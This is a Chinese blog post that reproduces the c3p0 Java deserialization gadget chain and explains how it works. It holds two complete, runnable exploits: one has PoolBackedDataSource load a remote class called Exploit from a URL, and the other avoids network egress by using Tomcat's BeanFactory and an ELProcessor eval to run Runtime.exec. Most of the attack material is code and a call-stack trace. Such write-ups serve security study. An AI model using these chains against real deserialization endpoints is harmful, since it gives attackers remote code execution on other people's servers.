文章目录
前言
所需依赖按照ysoserial下载
<!-- https://mvnrepository.com/artifact/com.mchange/c3p0 -->
<dependency>
<groupId>com.mchange</groupId>
<artifactId>c3p0</artifactId>
<version>0.9.5.2</version>
</dependency>
<!-- https://mvnrepository.com/artifact/com.mchange/mchange-commons-java -->
<dependency>
<groupId>com.mchange</groupId>
<artifactId>mchange-commons-java</artifactId>
<version>0.2.11</version>
</dependency>
代码复现
工具类
反射get/set:
ReflectPacked/ValueGetterSetter.java
package ReflectPacked;
import java.lang.reflect.Field;
public class ValueGetterSetter {
public static void setValue(Class methodInClass, Object targetObj, String name, Object value) throws Exception{
Field field = methodInClass.getDeclaredField(name);
field.setAccessible(true);
field.set(targetObj, value);
}
public static void setValue(Object targetObj, String name, Object value) throws Exception{
setValue(targetObj.getClass(), targetObj, name, value);
}
public static Object getValue(Class methodInClass, Object targetObj, String name) throws Exception{
Field field = methodInClass.getDeclaredField(name);
field.setAccessible(true);
return field.get(targetObj);
}
public static Object getValue(Object targetObj, String name) throws Exception{
return getValue(targetObj.getClass(), targetObj, name);
}
}
反序列化:
UnserializePacked.Unserialize.java
package UnserializePacked;
import java.io.*;
public class Unserialize {
public static void unserialize(Object obj) throws Exception{
File f = File.createTempFile("temp", "out");
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
oos.writeObject(obj);
oos.close();
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
Object o = ois.readObject();
System.out.println(o);
ois.close();
f.deleteOnExit();
}
}
PoC
package c3p0;
import ReflectPacked.ValueGetterSetter;
import UnserializePacked.Unserialize;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
public class PoC {
public static void main(String[] args) throws Exception {
String url = "http://127.0.0.1/";
PoolBackedDataSource source = new PoolBackedDataSource();
ValueGetterSetter.setValue(PoolBackedDataSourceBase.class, source, "connectionPoolDataSource", new PoolSource("Exploit", url));
Unserialize.unserialize(source);
}
private static class PoolSource implements ConnectionPoolDataSource, Referenceable{
private String className;
private String url;
public PoolSource (String className, String url) {
this.className = className;
this.url = url;
}
public Reference getReference() throws NamingException {
return new Reference(this.className, this.className, this.url);
}
public PooledConnection getPooledConnection() throws SQLException {
return null;
}
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
return null;
}
public PrintWriter getLogWriter() throws SQLException {
return null;
}
public void setLogWriter(PrintWriter out) throws SQLException {
}
public void setLoginTimeout(int seconds) throws SQLException {
}
public int getLoginTimeout() throws SQLException {
return 0;
}
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
return null;
}
}
}
代码审计 | 原理分析
1. ReferenceSerialized.getObject()触发类加载
ReferenceSerialized是一个私有内部类,在ReferenceIndirector内,构造器传入四个参数,实现了IndirectlySerialized接口
只要contextName为空就能触发类加载,加载Reference存储的类
可以加载远程类,也可以加载本地类,因此就有不出网利用的方法
2. ReferenceIndirector.indirectForm()创建ReferenceSerialized实例
上面分析过ReferenceSerialized是内部私有类,它只通过ReferenceIndirector.indirectForm()创建
ReferenceIndirector的构造器是空的,所有三个属性都要通过setter传入
indirectForm()能创建ReferenceSerialized实例,传入实现了Referenceable接口的对象然后就会生成Reference创建ReferenceSerialized
因此传Reference需要手动写一个实现Referenceable的类,把一个静态代码块实现RCE的class放到服务器上,即可触发远程类加载
3. PoolBackedDataSourceBase反序列化触发IndirectlySerialized.getObject()
readObject触发了IndirectlySerialized.getObject()
而对象o是从反序列化中读取到的,o是怎么传进去的还得看writeObject()的逻辑
4. PoolBackedDataSourceBase.writeObject()序列化IndirectlySerialized对象
writeObject里面,第一个catch第二个try进行了生成IndirectlySerialized的操作
里面把this.connectionPoolDataSource传入,这是一个实现ConnectionPoolDataSource接口的对象
还得要确保实现Referenceable接口,并且进入catch部分
进入catch就是让第一个try报错,第一个try对this.connectionPoolDataSource序列化了,只要不继承Serializable就会报错
总结就是要手动编写一个实现上述两个接口、不能继承Serializable、getReference返回恶意Reference的类,如下所示:
POP链
<clinit>:6, Exploit
forName0:-1, Class (java.lang)
forName:348, Class (java.lang)
referenceToObject:91, ReferenceableUtils (com.mchange.v2.naming)
getObject:118, ReferenceIndirector$ReferenceSerialized (com.mchange.v2.naming)
readObject:211, PoolBackedDataSourceBase (com.mchange.v2.c3p0.impl)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:498, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1909, ObjectInputStream (java.io)
readOrdinaryObject:1808, ObjectInputStream (java.io)
readObject0:1353, ObjectInputStream (java.io)
readObject:373, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:23, PoC (c3p0)
※不出网利用c3p0
注意到调用的是ReferenceableUtils.referenceToObject()来进行类加载,支持本地工厂类和远程URL的类加载
因此可以不出网利用BeanFactory来进行本地类加载,同绕过JDK高版本JNDI注入
package c3p0;
import ReflectPacked.ValueGetterSetter;
import UnserializePacked.Unserialize;
import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;
import org.apache.naming.ResourceRef;
import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;
import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;
public class LocalPoC {
public static void main(String[] args) throws Exception {
PoolBackedDataSource source = new PoolBackedDataSource();
ValueGetterSetter.setValue(PoolBackedDataSourceBase.class, source, "connectionPoolDataSource", new PoolSource());
Unserialize.unserialize(source);
}
private static class PoolSource implements ConnectionPoolDataSource, Referenceable{
public PoolSource () {
}
public Reference getReference() throws NamingException {
ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
resourceRef.add(new StringRefAddr("forceString", "a=eval"));
resourceRef.add(new StringRefAddr("a", "Runtime.getRuntime().exec(\"calc\")"));
return resourceRef;
}
public PooledConnection getPooledConnection() throws SQLException {
return null;
}
public PooledConnection getPooledConnection(String user, String password) throws SQLException {
return null;
}
public PrintWriter getLogWriter() throws SQLException {
return null;
}
public void setLogWriter(PrintWriter out) throws SQLException {
}
public void setLoginTimeout(int seconds) throws SQLException {
}
public int getLoginTimeout() throws SQLException {
return 0;
}
public Logger getParentLogger() throws SQLFeatureNotSupportedException {
return null;
}
}
}
完
欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123486201
版权声明:本文为原创,转载时须注明出处及本声明